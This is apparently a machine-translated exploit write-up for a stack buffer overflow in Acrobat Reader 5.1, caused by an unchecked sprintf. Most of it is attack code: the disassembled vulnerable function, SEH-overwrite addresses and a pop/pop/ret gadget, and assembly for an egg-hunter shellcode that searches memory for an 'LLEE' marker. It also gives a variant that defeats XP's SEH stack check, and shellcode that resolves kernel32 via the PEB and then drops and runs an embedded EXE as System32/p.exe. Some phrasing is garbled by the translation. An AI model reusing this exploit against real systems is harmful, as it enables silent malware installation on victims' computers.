Author:
Leven
Only valid for Acrobat Reader 5.1
Put a long
Problem code
001b: 2200E249 55 PUSH EBP
001b: 2200E24A 8BEC MOV EBP, ESP
001b: 2200E24C 81EC40010000 SUB ESP, 00000140 // Assign 0x140 Length
001b: 2200E252 53 PUSH EBX
001b: 2200E253 56 PUSH ESI
001b: 2200E254 57 Push EDI
001b: 2200E255 6A01 PUSH 01
001b: 2200E257 6A05 PUSH 05
001b: 2200E259 33DB XOR EBX, EBX
001b: 2200E25B FF7508 PUSH DWORD PTR [EBP 08]
001b: 2200E25E 8D4DFC LEA ECX, [EBP-04]
001b: 2200E261 895DFC MOV [EBP-04], EBX
001b: 2200E264 E839470500 CALL 220629A2
001b: 2200E269 A1542D0A22 MOV EAX, [220A2D54]
001b: 2200E26E 53 Push EBX
001b: 2200E26F FF75FC Push DWORD PTR [EBP-04]
001b: 2200E272 FF5064 CALL [EAX 64]
001b: 2200E275 59 POP ECX
001b: 2200E276 59 POP ECX
001b: 2200E277 50 Push EAX
001b: 2200E278 8D85C0Feffff Lea EAX, [EBP-0140]
001b: 2200E27E 682C4D0922 Push 22094D2C
001b: 2200E283 50 Push EAX
001b: 2200E284 FF1564F20822 Call [MSVCRT! Sprintf] // Insensitive call sprintf causes overflow
001b: 2200E28A 83C40C Add ESP, 0C
001b: 2200E28D 8D85C0Feffff Lea EAX, [EBP-0140]
001b: 2200E293 50 Push EAX
001b: 2200E294 FF15FCF00822 Call [kernel32! Outputdebugstringa]
001b: 2200E29A FF75FC PUSH DWORD PTR [EBP-04] 001B: 2200E29D 8B7510 MOV ESI, [EBP 10]
001b: 2200E2A0 56 PUSH ESI
001b: 2200E2A1 E8D7110000 Call 2200F47D // Call will have an abnormal
The allocation buffer is 0x140 size, and the SPFINTF does not perform a length check, resulting in overflow. Can override RET and exception handle functions
The nearest RET is on the 2200E697, the tribute is the kilobyte, too far, do not consider
So overwriting an abnormal processing address, exception handler linked list
12ed30
12ef3c
12f0e0
12F598
12FF04
12FFB0
12FFE0
Cover the first function 12ed30, change to POP ESI, POP Eax, RET (5E 5F C3) address 774A295A, before the four bytes changed to
PUSH ECX 51
POP ECX 59
POP EAX 58 / / It just gives the CONTEXT's head pointer to EAX, will be used later
Push 774A295A 68 / / The return address 774A295A is just jumped, and the instructions behind are running.
After skipping 774A295A, it is shellcode
After several JAE jumps, jump to the place where the visible characters are not restricted, only 160 bytes are available, with this byte to search memory, logo is LLEE, find real shellcode (behind the XDF file)
Search memory code 1
JMP EXCEP1
EXCEP2:
MOV ECX, FS: [0] // Take over
Push ECX
MOV FS: [0], ESP
MOV EDX, 0x45454C4D // Llee
Dec edx
MOV EAX, ESI
NEXT:
INC EAX / / Search memory
CMP [EAX], EDX
JZ Find
JMP next
Find:
Add eax, 4 // Find, jump
JMP EAX
EXCEP1:
Call Excep2
MOV EDX, [ESP 0xC]
XOR EBX, EBX
MOV BL, 1
SHL EBX, 0x0C
Add [EDX 0xB0], EBX
XOR EAX, EAX
RET
The experiment found that this method of search memory is outside the XP, because the exception handling of XP has a detection than 2K,
001b: 77f978d1 8b4304 MOV EAX, [EBX 04] // EAX is the address of the first function of the abnormal structure chain, that is, the above Excep1
001b: 77f978d4 3B45FC CMP EAX, [EBP-04]
001b: 77f978d7 7209 JB 77F978E2
001b: 77f978d9 3B45F8 CMP EAX, [EBP-08] // [EBP-08] is taken from FS: [4], StackBase
001b: 77F978DC 0F82A8000000 JB 77F9798A // The visible exception handler is less than stackbase, the function will not be called (the stack cannot be implemented?)
So in order to compatibility with XP, the following search memory is used to complete the MOV EDX, [ESP 8] // ESP 8 is exactly the first chain of the previous exception chain.
MOV FS: [0], EDX // Because fs: 0 has been automatically modified by the system, it will place the original processing function in FS: 0, which has returned here.
MOV EAX, [EAX 0xB0] // [EAX 0xB0] is context.eax, after several POP and PUSH, at this time, EAX is pointing to the original ESP C, ie Context
Mov EDX, 0x45454C4D // Search Normal Search
Dec edx
Add eax, 0x1000
NEXT:
INC EAX
CMP [EAX], EDX
JZ Find
JMP next
Find:
Add Eax, 4
JMP EAX
After finding the real shellcode, get the base address of Kernel32.dll by PEB (98 need to be processed), then get the address of each API
Mov Eax, FS: 0x30
Mov Eax, [EAX 0x0c]
Mov ESI, [EAX 0x1c]
Lodsd
Mov Eax, [EAX 0x08]
Afterwards open your own file, deploose the EXE file into System32 / P.exe by the specified file offset, and execute.
